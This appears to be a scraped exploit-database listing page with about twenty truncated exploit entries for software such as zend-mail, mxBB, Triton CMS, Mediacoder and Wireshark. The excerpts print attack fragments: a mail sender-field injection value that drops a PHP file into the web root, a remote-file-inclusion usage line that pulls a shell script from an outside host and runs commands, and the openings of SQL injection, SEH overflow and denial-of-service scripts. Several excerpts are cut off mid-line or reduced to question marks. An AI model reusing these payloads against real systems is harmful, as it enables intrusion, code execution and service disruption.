Reaper - Proof Of Concept On BYOVD Attack

Reaper is a proof-of-concept designed to exploit BYOVD Bring Your Own Vulnerable Driver driver vulnerability. This malicious technique involves inserting a legitimate, vulnerable driver into a target system, which allows attackers to exploit the driver to perform malicious actions. Reaper was...

Zend Framework / zend-mail < 2.4.11 - Remote Code Execution

09607 09607 09607 See the full advisory URL for the exploit details. / // Attacker's input coming from untrusted source such as $GET , $POST etc. // For example from a Contact form with sender field $emailfrom = '"attacker" -oQ/tmp/ -X/var/www/cache/phpcode.php "@email.com'; // encoded phpinfo...

XBlast 2.6.1 HOME Environment Variable Buffer Overflow Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/8296/info XBlast is contains a locally exploitable buffer overflow vulnerability due to insufficient bounds checking of data supplied via the HOME environment variable. Successful exploitation would allow a local user to...

Nvidia NView 3.5 Keystone.EXE Local Denial of Service Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/21260/info NVIDIA nView is prone to a local denial-of-service vulnerability. An attacker can exploit this issue to crash the affected computer, denying service to legitimate users. / NVIDIA nView keystone local Denial Of...

marbles 1.0.1 - Local Home Environment Variable Buffer Overflow Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/8710/info A problem in the handling of data in the Home environment variable has been reported in the marbles program. This may make it possible for a local attacker to gain elevated privileges. / c-marbles.c PoC exploit...

Mediacoder 0.7.5.4710 "Universal" SEH Buffer Overflow Exploit

No description provided by source. !/usr/bin/env python Mediacoder 0.7.5.4710 Universal SEH Buffer Overflow Exploit Coded By: DrIDE Found By: abhishek lyall Usage: Load the evil .m3u file and click on it. Download: http://www.exploit-db.com/application/14612 Tested On: Windows XPSP3 windows/exec ...

mxBB Module FAQ & RULES 2.0.0 - Remote File Inclusion Exploit

No description provided by source. !/usr/bin/php -q -d shortopentag=on ? print ' mxBB Module MX Faq & Rules = 2.0.0 faq.php Remote File Include Exploit Vendor: http://www.mx-system.com/modules/mxpafiledb/dload.php?action=download&fileid=371 Bug found and Exploit by bd0rk from SOH-Crew Website1:...

MailEnable 1.8 - Remote Format String Denial of Service Exploit

No description provided by source. See-security Technologies ltd. http://www.see-security.com MailEnable 1.8 Format String DoS exploit Discovered by Mati Aharoni Coded by tal zeltzer import sys import time import socket def PrintLogo: print...

Real Player 14.0.2.633 Denial Of Service

!/usr/bin/perl +Exploit Title: Real player 14.0.2.633 Buffer overflow/DOS Exploit +Software Link: www.soft32.com/download122615.html +Software: Real player +Version: 14.0.2.633 +Tested On: WIN-XP SP3 + Date : 31.03.2011 + Hour : 13:37 PM Similar Bug was found by cr4wl3r in MediaPlayer Classic...

XP Book v3.0 login Admin Exploit

No description provided by source. || || | || o,7 || . o7 || 4||| ow, : / / . |-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| | | | /' \ /'\ /\ \ /'\ /\ \ | | /, \ /\/\L\ \ \ \ ,/\ /\ \ \ \ / | | //\ \ /' \ /\ //\ /'\ \ /\ \ \ \ /'\ \ | | \ \ /\ /\ \ \ \ /...

FTPShell Client 4.1 RC2 Name Session Stack Overflow Exploit

Exploit for unknown platform in category local exploits =========================================================== FTPShell Client 4.1 RC2 Name Session Stack Overflow Exploit =========================================================== / FTPShell Client, Name Session Stack Overflow Exploit Tested...

Triton CMS Pro (X-Forwarded-For) Blind SQL Injection Exploit

No description provided by source. !/usr/bin/perl -w Triton CMS Pro X-Forwarded-For Blind SQL Injection Admin's username/hash disclosure exploit Benchmark method, so take a coffee and relax Coded by GiReX use LWP::UserAgent; use HTTP::Request; ifnot defined $ARGV0 print "\nUsage: perl $0 host pat...

runcms-overwrite.txt

RunCmss Bug Yahoo! Crawler body font-size: 10px; font-family: verdana; INPUT BORDER-TOP-WIDTH: 1px; FONT-WEIGHT: bold; BORDER-LEFT-WIDTH: 1px; FONT-SIZE: 10px; BORDER-LEFT-COLOR: D50428; BACKGROUND: 590009; BORDER-BOTTOM-WIDTH: 1px; BORDER-BOTTOM-COLOR: D50428; COLOR: 00ff00; BORDER-TOP-COLOR:...

segue-rfi.txt

?????????? ??????????????? ??????????????????? ??????????????????????? ?????????????????????????? ?????????????????????????????? ????????????????????????????????? ??????????????????????????????????? ????????????????????????????????????? ???????????????????????????????????????...

WireShark < 0.99.6 MMS Remote Denial of Service Exploit

No description provided by source. include winsock2.h include stdio.h pragma commentlib, "ws232" char http = "POST / HTTP/1.0\r\n" "Content-Type: application/vnd.wap.mms-message\r\n"; char hoststr = "Host: %s:%d\r\n"; char contentlenstr = "Content-Length: %d\r\n\r\n";...

mxBB Module FAQ & RULES 2.0.0 - Remote File Inclusion

!/usr/bin/php -q -d shortopentag=on cmd: a shell command ls -la Options: -pport: specify a port other than 80 -Pip:port: specify a proxy Example: php '.$argv0.' localhost http://www.shellsite.com/shell.txt ls -la -P1.1.1.1:80 shell.txt:...

Microsoft Windows Explorer - '.ANI' File Denial of Service

/ MS Windows Explorer Unspecified .ANI File DoS Another .Ani bug that freezes Explorer if you open a folder that contains a crafted file. Tested against Win XP SP2 FR. Have Fun! Coded by Marsu / include "stdio.h" include "stdlib.h" unsigned char Aniheaders =...

IrfanView 3.99 - .ani Local Buffer Overflow (1)

IrfanView 3.99 - .ani Local Buffer Overflow 1 / IrfanView 3.99 .ANI File Buffer Overflow IrfanView is vulnerable to a buffer overflow when opening a crafted .ani file. The overflow occurs while it is creating a snapshot of the file. This exploit launches calc.exe. Tested against Win XP SP2 FR. Ha...

DotClear v1.2.5

DotClear v1.2.5 = RFi Vulnerabilities KaRTaL Download : http://www.spacemarc.it/scriptphp/index.php?script=meganoidesnews111 Script Name : DotClear v1.2.5 Coded By : KaRTaL Contact : k4rtalatgmaildotcom V.Code in : path/index.php require $blogdcpath.'/layout/append.php'; Exploit :...

VS-Link-Partner 2.1 - script_pfad Remote File Inclusion

VS-Link-Partner 2.1 - scriptpfad Remote File Inclusion VS-Link-Partner //'=============================================================================================== //'Script Name: VS-Link-Partner //'.... //'.. //'ERROR--------------------------------------------------------- // ajann,Turkey...